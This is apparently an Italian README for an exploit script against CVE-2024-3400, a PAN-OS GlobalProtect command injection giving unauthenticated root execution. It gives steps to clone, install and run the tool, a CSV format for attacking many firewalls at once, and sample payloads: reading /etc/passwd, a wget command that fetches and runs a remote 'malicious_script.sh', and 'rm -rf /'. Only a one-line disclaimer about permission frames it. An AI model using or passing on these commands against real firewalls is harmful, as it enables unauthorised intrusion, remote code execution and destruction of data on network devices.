
Script di exploit per CVE-2024-3400, un'iniezione di comandi in PAN-OS GlobalProtect, che consente l'esecuzione remota di codice non autenticata con privilegi di root. Supporta lo sfruttamento di singoli target e di più target basati su CSV.
Questo script è progettato per dimostrare lo sfruttamento delle vulnerabilità nei firewall PAN-OS. Invia un payload appositamente costruito all'endpoint API del firewall per eseguire comandi arbitrari. Questo exploit prende di mira specificamente CVE-2024-3400, una vulnerabilità di iniezione di comandi nella funzionalità GlobalProtect del software PAN-OS di Palo Alto Networks per versioni specifiche di PAN-OS. Configurazioni di funzionalità particolari possono consentire a un utente malintenzionato non autenticato di eseguire codice arbitrario con privilegi di root sul firewall.
Nota: Assicurati di utilizzare questo script solo per scopi legali ed etici, e solo su macchine su cui hai il permesso di testare.
Per utilizzare questo progetto, segui questi passaggi:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Segui le istruzioni per inserire l'indirizzo IP del firewall PAN-OS vulnerabile e il payload da eseguire.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
Lo script chiederà il percorso del file del certificato SSL dal server firewall PAN-OS. Se non viene fornito alcun percorso, lo script imposterà automaticamente la verifica SSL su false, disabilitando di fatto SSL.
Questo script ti permette di sfruttare più target di firewall PAN-OS vulnerabili utilizzando un file CSV. Di seguito sono riportate le istruzioni per formattare correttamente il file CSV:
Il file CSV dovrebbe avere tre colonne:
ipaddress: L'indirizzo IP del firewall PAN-OS vulnerabile. payload: Il payload da eseguire sul firewall. path/to/root_CA_certificate.pem: Il percorso del certificato CA radice (lascia vuoto se la verifica del certificato è disabilitata).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Crea un file CSV con il formato specificato. Inserisci gli indirizzi IP, i payload e i percorsi dei certificati CA radice (se applicabili). Assicurati di fornire percorsi validi per i certificati CA radice o lascia il campo vuoto se la verifica del certificato è disabilitata. Esegui lo script e scegli l'opzione per utilizzare il file CSV quando richiesto.